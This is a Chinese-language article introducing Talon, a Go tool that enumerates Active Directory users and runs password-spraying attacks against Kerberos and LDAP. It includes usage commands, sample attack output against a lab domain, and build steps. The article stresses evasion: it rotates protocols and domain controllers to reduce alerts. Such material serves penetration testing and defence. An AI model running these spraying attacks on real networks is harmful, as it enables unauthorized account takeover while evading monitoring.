溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
針對Kerberos和LDAP服務的密碼爆破工具Talon是怎樣的,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。
Talon是一款針對Kerberos和LDAP服務的密碼爆破工具,該工具能夠在保持在無法被檢測到的情況下執行自動化的密碼爆破攻擊。Talon能夠枚舉Kerberos用戶列表,并識別出有效的用戶角色。除此之外,Talon還可以針對Kerberos和LDAP Secure服務來執行密碼爆破攻擊。Talon能夠使用一個或多個域控制器來執行這些攻擊,并且能夠實現域控制器和服務(Kerberos或LDAP Secure)之間的請求隨機化。
廣大研究人員可以訪問該項目的【Releases頁面】來下載對應操作系統架構的Talon。
$ ./Talon -h Usage of ./Talon: -D string Fully qualified domain to use -E Enumerates which users are valid -H string Domain controller to connect to -Hostfile string File containing the list of domain controllers to connect to -K Test against Kerberos only -L Test against LDAP only -O string File to append the results to -P string Password to use -U string Username to authenticate as -Userfile string File containing the list of usernames -debug Print debug statements -sleep float Time inbetween attempts (default 0.5)
用戶枚舉模式可以使用-E選項來執行,該模式下的Talon只會向目標目標KDC發送Kerberos TGT預認證請求,不過這個請求目前使用的是不支持的加密類型。Talon將會檢查KDC返回的響應信息,并判斷其中是否包含KDC_ERR_ETYPE_NOSUPP(表明用戶存在)或DC_ERR_C_PRINCIPAL_UNKNOWN(表明用戶不存在)。Talon能夠針對目標企業中的多個域控制器來執行這種類型的枚舉操作,使用-Hostfile命令即可指定多個域控制器,或使用-H來指定單個域控制器。這項技術并不會觸發登錄失敗的情況,因此不會鎖定任何用戶賬號。
./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E __________ ________ ___ ________ ________ |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \ \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \ \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \ \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \ \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\ \|__| \|__|\|__|\|_______|\|_______|\|__| \|__| (@Tyl0us) [-] 172.16.144.195 STARLABS.LOCAL\asmith: = User Does Not Exist [+] 172.16.144.185 STARLABS.LOCAL\ballen: = User Exist [-] 172.16.144.186 STARLABS.LOCAL\bjohnson: = User Does Not Exist [-] 172.16.144.195 STARLABS.LOCAL\bwayne: = User Does Not Exist [+] 172.16.144.195 STARLABS.LOCAL\csnow: = User Exist [-] 172.16.144.186 STARLABS.LOCAL\jtodd: = User Does Not Exist [+] 172.16.144.186 STARLABS.LOCAL\hwells: = User Exist [-] 172.16.144.186 STARLABS.LOCAL\wwest: = User's Account Locked
Talon針對的是Kerberos和LDAP,這兩個服務都整合進了活動目錄AD中以實現身份認證。Talon能夠通過在這兩個服務之間交替執行密碼爆破攻擊,從而實現在兩個協議之間分割密碼攻擊流量。這會拆分生成的潛在事件數量,從而減少發出警報的幾率。Talon更進一步,通過使用-Hostfile向企業中的多個域控制器分發密碼攻擊,每次在LDAP和Kerberos之間交替,以創建額外的模糊層。如果需要,可以使用-H命令提供單個域控制器。
./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1 __________ ________ ___ ________ ________ |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \ \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \ \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \ \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \ \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\ \|__| \|__|\|__|\|_______|\|_______|\|__| \|__| (@Tyl0us) [-] 172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed [-] 172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed [-] 172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed [+] 172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success [-] 172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed
Talon還可以使用-K選項或-L選項來進隊Kerberos或LDAP執行滲透攻擊。
除此之外,在執行密碼爆破攻擊的過程中,Talon還可以使用Kerberos和LDAP來讀取響應信息。Talon能夠在執行密碼破解攻擊的過程中,通過讀取每一次密碼請求嘗試返回的響應碼來檢測賬號鎖定情況,這將幫助我們防止在企業內部網絡進行測試的時候出現賬號被鎖定的情況,以避免被檢測到。
root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2 __________ ________ ___ ________ ________ |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \ \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \ \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \ \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \ \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\ \|__| \|__|\|__|\|_______|\|_______|\|__| \|__| (@Tyl0us) [-] 172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed [-] 172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed [-] 172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked [*] Account lock out detected - Do you want to continue.[y/n]:
Talon基于Golang開發,如需貢獻自己的代碼,首先請將該項目代碼庫克隆至本地。在編譯Talon之前,我們還需要安裝好相應的依賴組件。請先運行下列命令:
go get github.com/fatih/color go get gopkg.in/jcmturner/gokrb5.v7/client go get gopkg.in/jcmturner/gokrb5.v7/config go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID go get gopkg.in/ldap.v2
接下來,運行下列命令實現項目構建:
go build Talon.go
看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
